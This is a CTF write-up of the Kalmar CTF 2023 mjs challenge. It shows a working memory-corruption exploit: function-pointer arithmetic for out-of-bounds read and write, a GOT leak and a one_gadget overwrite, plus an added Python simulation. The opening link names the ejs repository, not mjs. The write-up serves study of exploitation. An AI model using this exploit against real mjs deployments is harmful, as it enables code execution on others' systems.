[CTF write up] Kalmar CTF 2023 - mjs : Baby Open-Source Exploiting

2023. 3. 6. 02:15 (CTF write up)

https://github.com/mde/ejs

 


mjs stores a function as a raw pointer and lets you do arithmetic on it with an integer: a remarkable vulnerability (?) or feature (?). It also looks as if it has not been patched (?).

 

 

f = print;
f = f + 0x100;
f();  // calls mjs_print+0x100

In this way an out-of-bounds (OOB) call is possible: adding an integer to a function value moves the pointer by that many bytes, and calling the result jumps to whatever sits at that offset from print.

 

let f = print;

// Read the 6 low bytes of the __libc_start_main pointer stored at offset 0x26960
// from print (the binary's GOT entry) and assemble them little-endian.
let libc_start_main = f[0x26960];
for (let i = 1; i < 6; i++) {
    libc_start_main = libc_start_main + (f[0x26960 + i] << 8 * i);
}

// libc base = leak - offset of __libc_start_main, then add the one_gadget offset.
// (The variable is called `system` in the original but holds the one_gadget address.)
let system = libc_start_main - 0x29dc0 + 0xebcf5;

// Overwrite the GOT entry at offset 0x269c0 from print, byte by byte, with that address.
for (let i = 0; i < 6; i++) {
    f[0x269c0 + i] = (system >> 8 * i) & 0xff;
}

// print('') now goes through the patched GOT entry and lands on the one_gadget.
print('')

Not only an OOB call but also OOB read and write are possible: indexing the function value with an integer reads or writes the byte at that offset from print. Because print lives inside the mjs binary, every offset is relative to the binary itself, so no separate leak of its load address is needed. Reading one GOT entry yields a libc pointer, and overwriting another GOT entry with a one_gadget address is enough to solve the challenge.

 

let f = print; let libc_start_main = f[0x26960]; for(let i = 1; i < 6; i++){ libc_start_main = libc_start_main + (f[0x26960+i] << 8*i); } let system = libc_start_main - 0x29dc0+0xebcf5; for(let i = 0; i < 6; i++){    f[0x269c0+i] = (system >> 8*i) & 0xff; } print('')

The payload has to be sent as a single line.
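The pointer arithmetic above (reading the 6-byte leak, rebasing to the one_gadget, writing it back) and the one-line requirement, worked through as an added Python example that is not part of the original write-up: it reuses the write-up's offsets, simulates the mjs f[i] read/write primitive over a constructed byte array standing in for the process memory, and joins the script into a single line. The FakeTarget class and the sample libc base are assumptions for the demo; the glibc offsets are the ones the write-up used and must be recomputed for any other libc build.

```python
import struct

# Offsets taken from the write-up's mjs script. The two glibc offsets are the ones the
# write-up used and are specific to the target's libc build; recompute them for another target.
LIBC_START_MAIN_OFF = 0x29dc0   # __libc_start_main relative to the libc base
ONE_GADGET_OFF = 0xebcf5        # one_gadget relative to the libc base
GOT_LEAK_OFF = 0x26960          # print + this = GOT entry holding the __libc_start_main pointer
GOT_WRITE_OFF = 0x269c0         # print + this = GOT entry that print('') goes through


def le_bytes_to_int(byte_values):
    """Assemble little-endian bytes into an integer, exactly as the mjs read loop does."""
    value = 0
    for i, b in enumerate(byte_values):
        value += b << (8 * i)
    return value


def int_to_le_bytes(value, n=6):
    """Split an integer into n little-endian bytes, as the mjs write loop does.
    Six bytes cover a user-space x86-64 address; its top two bytes are zero anyway."""
    return [(value >> (8 * i)) & 0xff for i in range(n)]


def one_gadget_from_leak(leaked_start_main):
    """Rebase from the leaked __libc_start_main address to the one_gadget address."""
    libc_base = leaked_start_main - LIBC_START_MAIN_OFF
    return libc_base + ONE_GADGET_OFF


class FakeTarget:
    """Constructed stand-in for the mjs process (hypothetical, not the real binary):
    a flat byte array in which index 0 is `print`, so mjs's f[i] maps to mem[i].
    Only the two GOT slots the exploit touches are populated."""

    def __init__(self, leaked_start_main):
        self.mem = bytearray(0x27000)
        self.mem[GOT_LEAK_OFF:GOT_LEAK_OFF + 8] = struct.pack("<Q", leaked_start_main)
        # Some resolved libc function pointer; the exploit replaces it.
        self.mem[GOT_WRITE_OFF:GOT_WRITE_OFF + 8] = struct.pack("<Q", 0x7f00aabbccd0)

    def read_byte(self, i):      # f[i]
        return self.mem[i]

    def write_byte(self, i, v):  # f[i] = v
        self.mem[i] = v & 0xff

    def got_write_value(self):
        return struct.unpack("<Q", self.mem[GOT_WRITE_OFF:GOT_WRITE_OFF + 8])[0]


def run_exploit(target):
    """The same three steps as the mjs script, driven through the byte primitives."""
    leak = le_bytes_to_int(target.read_byte(GOT_LEAK_OFF + i) for i in range(6))
    gadget = one_gadget_from_leak(leak)
    for i, b in enumerate(int_to_le_bytes(gadget)):
        target.write_byte(GOT_WRITE_OFF + i, b)
    return gadget


# The write-up's mjs script, kept free of // comments so it survives being joined into
# one line (a // comment would swallow the rest of a one-liner).
MJS_SCRIPT = """
let f = print;
let libc_start_main = f[0x26960];
for(let i = 1; i < 6; i++){ libc_start_main = libc_start_main + (f[0x26960+i] << 8*i); }
let system = libc_start_main - 0x29dc0 + 0xebcf5;
for(let i = 0; i < 6; i++){ f[0x269c0+i] = (system >> 8*i) & 0xff; }
print('')
"""


def one_line_payload(script=MJS_SCRIPT):
    """Collapse the script into the single line the challenge service expects."""
    return " ".join(line.strip() for line in script.strip().splitlines() if line.strip())


if __name__ == "__main__":
    base = 0x7f3c4a2e1000                        # constructed libc base for the demo
    t = FakeTarget(base + LIBC_START_MAIN_OFF)
    print(hex(run_exploit(t)), hex(t.got_write_value()))
    print(one_line_payload())
```

For a different target, take the __libc_start_main offset from the libc's symbol table and the gadget offset from the one_gadget tool, then check that the overwritten entry is really the one print('') resolves through; writing six bytes also relies on the top two bytes of the existing pointer already being zero, which holds for user-space x86-64 addresses.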